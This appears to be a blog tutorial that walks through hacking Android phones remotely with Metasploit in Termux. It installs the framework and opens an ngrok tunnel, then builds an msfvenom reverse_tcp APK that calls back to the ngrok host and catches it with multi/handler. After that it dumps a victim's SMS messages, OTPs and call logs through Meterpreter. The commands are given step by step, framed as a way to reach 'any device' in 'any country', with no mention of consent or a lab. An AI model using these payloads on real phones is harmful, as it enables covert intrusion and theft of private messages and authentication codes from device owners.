Banner ads

metasploit hacking android over wan from ngrok

metasploit hacking android over wan from ngrok - Hi guys if you are searching for metasploit hacking android over wan from ngrok and searching for the best article to get the best explanation about metasploit hacking android over wan from ngrok. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "metasploit hacking android over wan from ngrok". By this article, you can get a lot of about metasploit app download for android, how to hack other phones camera, port forwarding guide, Metasploit course part 5. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

metasploit hacking android over wan from ngrok

metasploit hacking android over wan from ngrok

Hello, guys welcome back to another amazing post, so today let us know about how to hack android mobile and get target data in our device from metasploit payload with portforwarding from ngrok with easy steps.Here we use ngrok for portforwarding our connection from portforwardig you can hack anydevice which located may be in any long distance in any country. So let's get started.

#Follow below step's

1Install termux and update and upgrade it

$ pkg install php -y

$ pkg install git -y


$ pkg install python -y


$ pkg install perl -y


$ pkg install python2 -y


$ pkg install ruby -y


$ cd $HOME


$ git clone https://github.com/noob-hackers/m-wiz


#STEP 1 (METASPLOIT INSTALLATION NO ROOT)

This script will install Metasploit framework in your termux app so you need some requirements to use Metasploit in termux`                        1    


> Good internet connection

> 1 Gb of internet
> 2 Gb of storage
> Stable android device version not below then 4.0.0
> Patience

After completing all requirements you can go ahead for the installation of Metasploit in termux.


$ ls


$ cd m-wiz


$ bash m-wiz.sh


Now here in script menu select option 1 to install Metasploit framework in termux and after a 30 seconds process will be shown and after that, a version selection menu will have appeared and in that select, you devise version and click on enter in keyboard and wait for at least 1 hour or 1:30 hour it depends on your android device so I recommend you to stay away from the device until the Metasploit installs properly. So take a walk outside till it installs :)


#STEP 2 (METASPLOIT CONSOLE OPENING)


After the successful installation Metasploit will automatically be opened in the same session if it doesn't then follow the below step. if you are using (6.0.0) version based device


$ cd ..


$ ls


cd usr


$ cd opt


$ cd metasploit-framework


$ ./msfconsole


Or 


$ msfconsole


Now from here the Metasploit console will be opened if it doesn't then repair Metasploit from the m-wiz tool it will solve the issue...


#STEP 3 (CREATING PORT FORWARDING TUNNEL)


For portforwarding we will use Ngrok here so, You need to install and configure ngrok in your termux first after that you can follow next step.

1. Open your web browser and search ngrok and click on first link and then click on Signup
and signup to ngrok from real gmail or fake gmail. After that a new inteface opens when you log in, Now in that page click on LINUX (ARM 64) and then download starts. After download finishes. Open same page and scroll down and you can see Connect Your Account just below that there is an auth token. Copy it and past it somewhere else in any notepad or notes.

Example:-  ./ngrok authtoken 1i6Ae3XmbdfSrjltFWXyryrygrt5454tvddwee

You can see above example, Now after Copying it now open you android file browser and get into Download folder and search for ngrok kali zip file ngrok-stable-linux-arm64 now uzip it in the same folder and move ngrok named file to your internal storageof device which came after extracting from zip file. by the help of rar or any other app.

2. Now open termux and make sure you followed all the steps carefully.

$ cd $HOME

$ cd /sdcard

$ ls 

Now here you can see your internal storage, Now here you can see ngrok file if not then please follow step 1 again. If ngrok is successfully moved then now follow below steps.

$ cp ngrok $HOME

$ cd $HOME

$ ls

Now, ngrok is copied and showed in termux home screen if it is there. Then

$ chmod +x ngrok

Now, paste your auth token and verify ngrok file and ngrok file will become green.

Example:-  ./ngrok authtoken 1i6Ae3XmbdfSrjltFWXyryrygrt5454tvddwee

Now, here ngrok will be verified, So here all the process completes about portforwarding step.

#STEP 4 (CREATING PAYLOAD AND HACKING)

Exit and reopen termux and follow below commands.

Open new session and type.

$ ./ngrok tcp (any 4 didgit number)

Example:- ./ngrok tcp 9835

Now, in that session copy this 0.tcp.ngrok.io:13442 and paste this anywhere in notepad or notes. If there is no session starts then please trun on Hotspost of device.

$ cd $HOME


$ ls


$ cd metasploit-framework


$ ./msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13442 R > /sdcard/anything.apk


Wait until payload get ready ....after that follow this (open 2nd session)


$ cd $HOME/metasploit-framework


$ ./msfconsole


now open new (3rd) session and apply these commands


 pg_ctl -D $PREFIX/var/lib/postgresql start


now come back to (2nd session) in which you opened Metasploit now apply these commands.


$ db_status


$ use exploit/multi/handler


$ set payload android/meterpreter/reverse_tcp


$ set lhost 
0.tcp.ngrok.io

set lport 9835 (write the port number which you typed while creating ngrok tunnel)


exploit

#STEP 5 (HACKING DETAILS AFTER METERPRETER SESSION)

Now when you get meterpreter session of your victim device follow the below steps to get his info.


Ex :-


meterpreter> help


(Now here all the commands to dump data will be shown now use them according to you needs for example.)


meterpreter > dump_sms


This command gets all our victims mobile SMS and OTP's and it will be saved in .txt formate like sms5563543bbfbbff.txt 


Like this you can fetch and save many things as I said in the beginning of this post and to see saved or fetched data.


$ cd $HOME/metasploit-framework


$ ls


Here, you will get all the saved .txt call logs and information and etc... to see that


$ cat calllogs586464dec564.txt


This will show all info in script formate. So guys that's all for today so I hope you liked this one.


metasploit hacking android over wan from ngrok in pdf version

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here


 websites I used in the video

Click Here


watch the practical video here ( part 1 )

Click Here

watch the practical video here ( part 2 )

Click Here

watch the practical video here ( part 3 )

Click Here

watch the practical video here ( part 4 )


watch the practical video here ( part 5 )

Click Here

watch the practical video here ( part 6 )

Click Here

watch the practical video here ( part 7 )

Click Here

 Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use contact us page, please........

Errors or issue reasons


  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience


    "Solution for all these problems is watching a video without skip until the end"

    Link for video will be available below
    Click On Below Button

    Post a Comment

    0 Comments